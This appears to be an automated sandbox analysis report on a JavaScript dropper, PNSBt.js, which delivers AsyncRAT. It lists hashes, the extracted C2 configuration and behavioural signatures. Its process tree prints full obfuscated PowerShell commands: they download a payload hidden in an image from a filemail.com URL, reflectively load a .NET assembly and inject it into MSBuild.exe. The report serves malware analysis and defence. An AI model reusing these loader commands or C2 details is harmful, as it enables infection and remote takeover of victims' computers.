Analysis
-
max time kernel
94s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 19:37
Static task
static1
Behavioral task
behavioral1
Sample
PNSBt.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
PNSBt.js
Resource
win10v2004-20241007-en
General
-
Target
PNSBt.js
-
Size
103KB
-
MD5
82bf71f9d463c60e2304cbf9f9cac022
-
SHA1
d54cce9d9a238310b00d154c9f35033e62ca1d81
-
SHA256
3f354bdb3557ffb64892e788c439adc0da9f7fd4f39b143a1cc2d8f7059b4488
-
SHA512
19bf4493c19a438fbd21266f012f21b22a2cf0448db22c41d9994afaa200a04a621968737953c12408f7d31e9c8c0bbd253e900823364210090e98a841b5004c
-
SSDEEP
3072:MHXp+q62Nhxdd5pdq61HXp+q62Nhxdd5pdqsVd0HXp+q62Nhxdd5pdq61HXp+q61:k3/13jc3/13+
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Extracted
asyncrat
| CRACKED BY https://t.me/xworm_v2
*** 19 NOV ***
19nov2024.duckdns.org:9003
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 12 1748 powershell.exe 24 1748 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4860 powershell.exe 1748 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation wscript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1748 set thread context of 2440 1748 powershell.exe 95 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4860 powershell.exe 4860 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe 1748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4860 powershell.exe Token: SeDebugPrivilege 1748 powershell.exe Token: SeDebugPrivilege 2440 MSBuild.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 3480 wrote to memory of 4860 3480 wscript.exe 82 PID 3480 wrote to memory of 4860 3480 wscript.exe 82 PID 4860 wrote to memory of 1748 4860 powershell.exe 84 PID 4860 wrote to memory of 1748 4860 powershell.exe 84 PID 1748 wrote to memory of 2712 1748 powershell.exe 92 PID 1748 wrote to memory of 2712 1748 powershell.exe 92 PID 1748 wrote to memory of 2712 1748 powershell.exe 92 PID 1748 wrote to memory of 2516 1748 powershell.exe 93 PID 1748 wrote to memory of 2516 1748 powershell.exe 93 PID 1748 wrote to memory of 2516 1748 powershell.exe 93 PID 1748 wrote to memory of 2708 1748 powershell.exe 94 PID 1748 wrote to memory of 2708 1748 powershell.exe 94 PID 1748 wrote to memory of 2708 1748 powershell.exe 94 PID 1748 wrote to memory of 2440 1748 powershell.exe 95 PID 1748 wrote to memory of 2440 1748 powershell.exe 95 PID 1748 wrote to memory of 2440 1748 powershell.exe 95 PID 1748 wrote to memory of 2440 1748 powershell.exe 95 PID 1748 wrote to memory of 2440 1748 powershell.exe 95 PID 1748 wrote to memory of 2440 1748 powershell.exe 95 PID 1748 wrote to memory of 2440 1748 powershell.exe 95 PID 1748 wrote to memory of 2440 1748 powershell.exe 95
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\PNSBt.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACgARwBlAFQALQBWAGEAcgBJAGEAQgBsAGUAIAAnACoAbQBkAFIAKgAnACkALgBOAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoAbwBJAE4AJwAnACkAKAAgACgAJwBjAHEAagBpAG0AYQBnAGUAVQByAGwAIAA9ACAAcABYAHoAaAB0AHQAcABzADoALwAvADEAMAAxADcALgBmAGkAbABlAG0AYQBpAGwALgBjAG8AbQAvAGEAcABpAC8AZgBpAGwAZQAvAGcAZQB0AD8AZgBpAGwAZQBrAGUAeQA9ADIAQQBhAF8AYgBXAG8AOQBSAGUAdQA0ADUAdAA3AEIAVQAxAGsAVgBnAHMAZAA5AHAAVAA5AHAAZwBTAFMAbAB2AFMAdABHAHIAbgBUAEkAQwBmAEYAaABtAFQASwBqADMATABDADYAUwBRACcAKwAnAHQASQBjAE8AYwBfAFQAMwA1AHcAJgBwAGsAXwB2ACcAKwAnAGkAZAA9AGYAZAA0AGYANgAxADQAYgBiADIAMAA5AGMANgAyAGMAMQA3ADMAMAA5ADQANQAxADcANgBhADAAOQAwADQAZgAgAHAAWAB6ADsAYwBxAGoAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACcAKwAnAGMAcQBqAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAYwBxAGoAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAGMAcQBqAGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAYwBxAGoAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAYwBxACcAKwAnAGoAaQBtAGEAZwBlAEIAeQB0AGUAcwApACcAKwAnADsAYwBxAGoAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAcABYAHoAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgBwAFgAegA7AGMAcQBqAGUAbgBkAEYAbABhAGcAIAA9ACAAcABYAHoAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHAAWAB6ADsAYwBxAGoAcwAnACsAJwB0AGEAcgAnACsAJwB0AEkAbgBkAGUAeAAgAD0AIABjAHEAagBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeAAnACsAJwBPACcAKwAnAGYAKABjAHEAagBzAHQAYQByAHQARgBsAGEAZwApADsAYwBxAGoAZQBuAGQAJwArACcASQBuAGQAZQB4ACAAPQAgAGMAcQBqAGkAbQAnACsAJwBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AJwArACcAZgAoAGMAcQBqAGUAbgBkAEYAbABhAGcAKQA7AGMAcQAnACsAJwBqACcAKwAnAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAYwBxAGoAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIABjAHEAagBzAHQAYQByAHQASQBuAGQAZQB4ADsAYwBxAGoAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgAGMAcQBqAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwBjAHEAagBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIABjAHEAagAnACsAJwBlAG4AZABJAG4AZABlAHgAIAAtACAAYwBxAGoAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGMAcQBqAGIAYQBzAGUANgA0AEMAbwAnACsAJwBtAG0AYQBuAGQAIAA9ACAAYwBxAGoAJwArACcAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACcAKwAnAGMAcQBqAHMAdABhAHIAdABJAG4AJwArACcAZABlAHgALAAnACsAJwAgAGMAcQBqAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwBjAHEAagAnACsAJwBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAIAA9ACAALQBqAG8AaQBuACAAKABjAHEAagBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkAC4AVABvAEMAaABhAHIAQQByAHIAYQB5ACgAKQAgAG4AeABhACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAGMAcQBqAF8AIAB9ACkAWwAtADEALgAuAC0AKABjAHEAagBiAGEAcwBlADYANABDAG8AJwArACcAbQBtAGEAbgBkAC4ATABlAG4AZwB0AGgAKQBdADsAYwBxAGoAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGMAcQBqAGIAYQBzAGUANgA0AFIAZQB2AGUAcgBzAGUAZAApADsAYwBxAGoAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwAnACsAJwBuAC4AQQBzAHMAZQBtAGIAJwArACcAbAB5ACcAKwAnAF0AJwArACcAOgA6AEwAbwBhACcAKwAnAGQAKABjAHEAagBjAG8AbQBtAGEAJwArACcAbgBkAEIAeQB0AGUAcwApADsAYwBxAGoAdgBhAGkATQBlACcAKwAnAHQAaABvAGQAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoAHAAWAB6AFYAQQBJAHAAWAAnACsAJwB6ACkAOwBjAHEAagB2AGEAaQBNAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACcAKwAnACgAYwBxAGoAbgB1AGwAbAAsACAAQAAoAHAAWAB6ADAALwA4AGUAUgAnACsAJwBOAEcALwBkAC8AZQBlAC4AZQB0AHMAYQBwAC8ALwA6AHMAcAB0AHQAaABwAFgAegAsACAAcABYAHoAZABlAHMAYQB0AGkAdgBhAGQAbwBwAFgAegAsACAAcABYAHoAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAJwArACcAbwBwAFgAegAsACAAcABYAHoAZABlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBwAFgAegAsACAAcABYAHoATQBTAEIAdQBpAGwAZABwAFgAegAsACAAcABYAHoAZABlACcAKwAnAHMAYQB0AGkAdgBhAGQAbwBwAFgAegAsACAAcABYAHoAZAAnACsAJwBlAHMAYQAnACsAJwB0AGkAdgBhAGQAbwBwAFgAegAsAHAAWAB6AGQAZQBzAGEAdABpAHYAYQBkAG8AcABYAHoALABwAFgAegBkAGUAcwBhAHQAaQB2AGEAZABvAHAAWAB6ACwAcABYAHoAZABlAHMAYQB0AGkAdgBhAGQAbwBwAFgAegAsAHAAWAB6AGQAZQBzAGEAdABpAHYAYQBkAG8AcABYAHoALABwAFgAegBkAGUAcwBhAHQAaQB2AGEAZABvAHAAWAB6ACwAcABYAHoAMQBwAFgAegAsAHAAWAB6AGQAZQAnACsAJwBzAGEAdABpAHYAYQBkAG8AcABYAHoAKQApADsAJwApAC4AcgBlAFAATABBAEMAZQAoACgAWwBDAEgAQQBSAF0AMQAxADAAKwBbAEMASABBAFIAXQAxADIAMAArAFsAQwBIAEEAUgBdADkANwApACwAJwB8ACcAKQAuAHIAZQBQAEwAQQBDAGUAKAAoAFsAQwBIAEEAUgBdADEAMQAyACsAWwBDAEgAQQBSAF0AOAA4ACsAWwBDAEgAQQBSAF0AMQAyADIAKQAsAFsAcwB0AHIAaQBOAGcAXQBbAEMASABBAFIAXQAzADkAKQAuAHIAZQBQAEwAQQBDAGUAKAAoAFsAQwBIAEEAUgBdADkAOQArAFsAQwBIAEEAUgBdADEAMQAzACsAWwBDAEgAQQBSAF0AMQAwADYAKQAsACcAJAAnACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VarIaBle '*mdR*').NaMe[3,11,2]-joIN'')( ('cqjimageUrl = pXzhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQ'+'tIcOc_T35w&pk_v'+'id=fd4f614bb209c62c1730945176a0904f pXz;cqjwebClient = New-Object System.Net.WebClient;'+'cqjimageBytes = cqjwebClient.DownloadData(cqjimageUr'+'l);cqjimageText = [System.Text.Encoding]::UTF8.GetString(cq'+'jimageBytes)'+';cqjstartFlag = pXz<<BASE64_START>>pXz;cqjendFlag = pXz<<BASE64_END>>pXz;cqjs'+'tar'+'tIndex = cqjimageText.Index'+'O'+'f(cqjstartFlag);cqjend'+'Index = cqjim'+'ageText.IndexO'+'f(cqjendFlag);cq'+'j'+'startIndex -ge 0 -and cqjendIndex -gt cqjstartIndex;cqjstartIndex += cqjstartFlag.Length;cqjbase64Length = cqj'+'endIndex - cqjstartIndex;cqjbase64Co'+'mmand = cqj'+'imageText.Substring('+'cqjstartIn'+'dex,'+' cqjbase64Length);cqj'+'base64Reversed = -join (cqjbase64Command.ToCharArray() nxa ForEach-Object { cqj_ })[-1..-(cqjbase64Co'+'mmand.Length)];cqjcommandBytes = [System.Convert]::FromBase64String(cqjbase64Reversed);cqjloadedAssembly = [System.Reflectio'+'n.Assemb'+'ly'+']'+'::Loa'+'d(cqjcomma'+'ndBytes);cqjvaiMe'+'thod = [dnlib.IO.Home].GetMethod(pXzVAIpX'+'z);cqjvaiMethod.Invoke'+'(cqjnull, @(pXz0/8eR'+'NG/d/ee.etsap//:sptthpXz, pXzdesativadopXz, pXzd'+'esativad'+'opXz, pXzdesativado'+'pXz, pXzMSBuildpXz, pXzde'+'sativadopXz, pXzd'+'esa'+'tivadopXz,pXzdesativadopXz,pXzdesativadopXz,pXzdesativadopXz,pXzdesativadopXz,pXzdesativadopXz,pXz1pXz,pXzde'+'sativadopXz));').rePLACe(([CHAR]110+[CHAR]120+[CHAR]97),'|').rePLACe(([CHAR]112+[CHAR]88+[CHAR]122),[striNg][CHAR]39).rePLACe(([CHAR]99+[CHAR]113+[CHAR]106),'$') )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2712
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2516
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:2708
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5d5161575b78a7cfb6fdce2dfd363031d
SHA1ca17416fdfa39530d5c3157a26703d277e8ec43f
SHA256a86fc8ce58db084b06f81b478f12d45540069e37d01f11307e77f8225dca3fee
SHA512a66f2112f02f1e7772bd93e387df43000c96ea32148a3dc598b12e464027b7628b9988c162e574ea4483a69ef9c8e02932163b1f7924c0331b76e827223e273a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82